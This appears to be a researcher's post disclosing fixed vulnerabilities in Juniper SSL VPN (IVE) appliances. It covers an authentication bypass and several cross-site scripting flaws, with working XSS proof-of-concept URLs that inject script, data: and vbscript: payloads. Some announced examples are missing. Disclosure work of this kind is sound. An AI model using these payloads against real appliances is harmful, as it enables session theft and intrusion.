This reminded me of a bunch of problems I spotted in Juniper SSL VPN a while ago; they are apparently fixed, but I don't recall seeing any public vendor advisory / credit for reporting them - so here you go, even if just for the record...
These were fixed by Juniper in IVE 6.3R1, 6.2R3, 6.1R5, 6.0R8, and 5.5 R7.1 over a year ago.
1) Auth bypass - IVE permitted just about any script on the box to be invoked without authentication by going through a /dana-na/download/?url= hop, for example:
2) XSS flaws (which are pretty bad in SSL VPN appliances, because they completely trash the security model of this access mode):
This worked in IVE 6.2: https://<IVE>/dana-na/meeting/meeting_testresult.cgi?redir=%2Fdana-na%2Fmeeting%2Flogin_meeting.cgi%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&java=1
This worked with IVE 5.5 & Firefox: https://<IVE>/dana-na/download/?url=/dana/home/launch.cgi?url=data:text/html%3bbase64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2b
This worked with IVE 5.5 & MSIE: https://<IVE>/dana-na/download/?url=/dana/home/launch.cgi?url=vbscript:MsgBox(%2522Hi%2522)
XSS + response splitting:
And some more vanilla XSSes: